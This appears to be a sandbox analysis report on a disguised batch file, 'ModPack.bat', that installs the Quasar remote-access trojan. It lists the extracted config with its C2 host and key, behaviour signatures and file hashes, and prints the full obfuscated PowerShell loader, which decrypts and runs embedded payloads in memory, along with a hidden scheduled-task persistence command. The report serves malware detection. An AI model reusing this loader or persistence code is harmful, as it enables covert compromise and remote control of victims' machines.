Analysis
- max time kernel: 36s
- max time network: 40s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 13-04-2024 20:25
Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: ModPack.bat; Resource: win10-20240404-en)
- Behavioral task: behavioral2 (Sample: ModPack.bat; Resource: win10v2004-20240412-en)
General
- Target: ModPack.bat
- Size: 1.6MB
- MD5: 3ab2a7793b323765353fa8e597cec156
- SHA1: c892cc5095ac6f37d0e94bbc09e11abe3d62027a
- SHA256: a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
- SHA512: 90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
- SSDEEP: 24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea
Malware Config
Extracted
- Family: quasar
- Version: 1.4.1
- Botnet: Office04
- C2: notes-creation.gl.at.ply.gg:27030
- Mutex: 6735a92b-88d2-4fbe-8e59-605a85072109
- encryption_key: 8681483EF512C654BECF205A0D74FFCA4B129A98
- install_name: Client.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: Trapix Client Startup
- subdirectory: SubDir
Signatures
- Quasar payload (1 IoC)
  Resource: behavioral2/memory/4728-53-0x000002B6F2C30000-0x000002B6F2F54000-memory.dmp
  YARA rule: family_quasar
- Blocklisted process makes network request (2 IoCs)
  Flow 29: PID 4728 powershell.exe
  Flow 31: PID 4728 powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence check.
  Key value queried: \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation (process: WScript.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings (process: powershell.exe)
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  PID 4876 powershell.exe (2 entries); PID 3024 powershell.exe (2 entries); PID 4728 powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  PID 4876 powershell.exe: SeDebugPrivilege
  PID 3024 powershell.exe: SeDebugPrivilege, followed by the following token set enabled three times in succession: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the listing stops at the 64th entry, after token 35 of the third pass)
- Suspicious use of WriteProcessMemory (10 IoCs)
  PID 4916 cmd.exe wrote to memory of PID 4876 powershell.exe (2 entries)
  PID 4876 powershell.exe wrote to memory of PID 3024 powershell.exe (2 entries)
  PID 4876 powershell.exe wrote to memory of PID 4364 WScript.exe (2 entries)
  PID 4364 WScript.exe wrote to memory of PID 3868 cmd.exe (2 entries)
  PID 3868 cmd.exe wrote to memory of PID 4728 powershell.exe (2 entries)
Processes
- [1] C:\Windows\system32\cmd.exe (PID 4916)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4876)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3024)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_737_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_737.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WScript.exe (PID 4364)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_737.vbs"
      Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe (PID 3868)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_737.bat" "
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4728)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_737.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_737.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
- Filesize: 1KB
  MD5: f0e4d6a27f7384e815df7e7d9f26794e
  SHA1: ec71de77f95d30bce9ddfe8ff9850fd2e380c1c9
  SHA256: bd116cb8748ba555139eb27150521271147442db63776ce75feb039437033fc9
  SHA512: 8b8d32e2acefba80099db5731e504f799d7a784c30ad7ed4b6bc21060431f51b7821b9c9daae71b5ca8343fa2e551d580e397b572ea56872dafce74d0bd27f49
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 1.6MB
  MD5: 3ab2a7793b323765353fa8e597cec156
  SHA1: c892cc5095ac6f37d0e94bbc09e11abe3d62027a
  SHA256: a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
  SHA512: 90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
- Filesize: 115B
  MD5: 450a84f4d8cc45a1b6c1ce4b4e5ac076
  SHA1: bad873d699d7c54bff2477fab4aa9223023b960e
  SHA256: 7dbda282c9889eb142bf745e6f1744d34be16ec9f3eac6560dc30329a44a45ff
  SHA512: 907b7e7473651ef197c38418af8f24f3d40e43f65d634d4c35990d1e82443b6efa04410b74342cb5b837d94e889b1e16a0299b42ed8e89574cfe4f8204ae40b5